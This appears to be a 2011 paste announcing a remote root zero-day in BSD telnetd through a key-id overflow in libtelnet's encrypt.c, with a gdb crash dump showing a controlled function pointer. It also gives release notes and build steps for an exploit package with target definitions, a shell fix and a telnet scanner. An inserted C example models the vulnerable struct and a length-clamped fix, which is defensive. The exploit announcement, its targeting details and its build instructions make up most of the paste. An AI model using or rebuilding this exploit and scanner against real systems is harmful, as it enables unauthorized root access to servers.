a guest
Dec 25th, 2011
ancient bsd remote root zeroday (encryption keyid overflow)
Discovered & Exploited by Kingcope
Year 2011
--

We overwrite a function pointer.

encrypt.c last commit (freebsd):
Wed Jun 26 17:06:14 2002 UTC (8 years, 9 months ago) by markm
and an even older bug :>

attached telnetd:
Program received signal SIGSEGV, Segmentation fault.
0x08055b22 in encrypt_keyid (kp=0x805e6a0, keyid=0x8061f02 'A' <repeats 100 times>, "ÿðð", len=100) at /usr/src/lib/libtelnet/../../contrib/telnet/libtelnet/encrypt.c:724
warning: Source file is more recent than executable.

724 if (!(ep = (*kp->getcrypt)(*kp->modep))) {
(gdb) i r
eax 0x41414141 1094795585
ecx 0x64 100
edx 0x41414141 1094795585
ebx 0xbfbfec78 -1077941128
esp 0xbfbfe770 0xbfbfe770
ebp 0xbfbfe798 0xbfbfe798
esi 0x1 1
edi 0xbfbfec80 -1077941120
eip 0x8055b22 0x8055b22
eflags 0x10282 66178
cs 0x33 51
ss 0x3b 59
ds 0x3b 59
es 0x3b 59
fs 0x3b 59
gs 0x1b 27
(gdb) x/10i $eip
0x8055b22 <encrypt_keyid+34>: mov (%eax),%eax
0x8055b24 <encrypt_keyid+36>: mov %eax,(%esp)
0x8055b27 <encrypt_keyid+39>: call *%edx <---- HAHA
0x8055b29 <encrypt_keyid+41>: mov %eax,0xfffffffc(%ebp)
0x8055b2c <encrypt_keyid+44>: cmpl $0x0,0xfffffffc(%ebp)
0x8055b30 <encrypt_keyid+48>: jne 0x8055b4b <encrypt_keyid+75>
0x8055b32 <encrypt_keyid+50>: cmpl $0x0,0x10(%ebp)
0x8055b36 <encrypt_keyid+54>: je 0x8055c87 <encrypt_keyid+391>
0x8055b3c <encrypt_keyid+60>: mov 0x8(%ebp),%eax
0x8055b3f <encrypt_keyid+63>: movl $0x0,0x40(%eax)
(gdb)

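The crash frame shows why a 100-byte key id ends in `call *%edx` with edx = 0x41414141: the key id buffer sits in front of the mode pointer and the getcrypt function pointer in the same struct, so an unchecked copy runs straight over both. Added example, not Kingcope's code and not FreeBSD's: a model of that struct with the length clamp such a copy needs, checked against the paste's 100 x 'A' input. Field names and MAXKEYLEN = 64 are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Model of libtelnet's per-direction key state: a fixed keyid buffer
 * followed by bookkeeping fields and a function pointer. Field names and
 * MAXKEYLEN = 64 are assumptions, not copied from the source. */
#define MAXKEYLEN 64
struct key_info {
    unsigned char keyid[MAXKEYLEN];
    int keylen;
    int dir;
    int *modep;
    int (*getcrypt)(int);
};

static int getcrypt_stub(int mode) { return mode; }

/* 1 if an unchecked "memcpy(kp->keyid, keyid, len)" of this length
 * (the 'before' form of the bug) would run into the getcrypt field. */
int reaches_getcrypt(int len) {
    return len > 0 && (size_t)len > offsetof(struct key_info, getcrypt);
}

/* Hardened form: reject negative lengths and clamp before the copy.
 * Returns the number of bytes stored. */
int keyid_store(struct key_info *kp, const unsigned char *keyid, int len) {
    if (len < 0) return -1;
    if (len > MAXKEYLEN) len = MAXKEYLEN;
    kp->keylen = len;
    memcpy(kp->keyid, keyid, (size_t)len);
    return len;
}

/* Push the paste's 100 x 'A' key id (constructed input) through the
 * hardened path; 1 if modep and getcrypt are untouched afterwards. */
int getcrypt_survives(void) {
    struct key_info kp; unsigned char keyid[100]; int mode = 0;
    memset(&kp, 0, sizeof kp); kp.modep = &mode; kp.getcrypt = getcrypt_stub;
    memset(keyid, 'A', sizeof keyid);
    keyid_store(&kp, keyid, (int)sizeof keyid);
    return kp.getcrypt == getcrypt_stub && kp.modep == &mode && kp.keylen == MAXKEYLEN;
}

int main(void) {
    printf("100-byte keyid reaches getcrypt: %d, hardened store keeps it intact: %d\n",
           reaches_getcrypt(100), getcrypt_survives());
    return 0;
}
```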
* main patch code and exploit logic are in libtelnet/encrypt.c & telnet/telnet.c
* targets are defined in telnet/targets.h
* added FreeBSD amd64 targets
* fixed a bug where the shell would close on freebsd.
* a simple telnet scanner is included (telnetscan.c)

how to build:
1.) checkout src-all via freebsd cvsup
2.) untar the package into /usr/src/contrib/
3.) cd into /usr/src/lib/libtelnet and type make && make install
    cd into /usr/src/usr.bin/telnet and type make && make install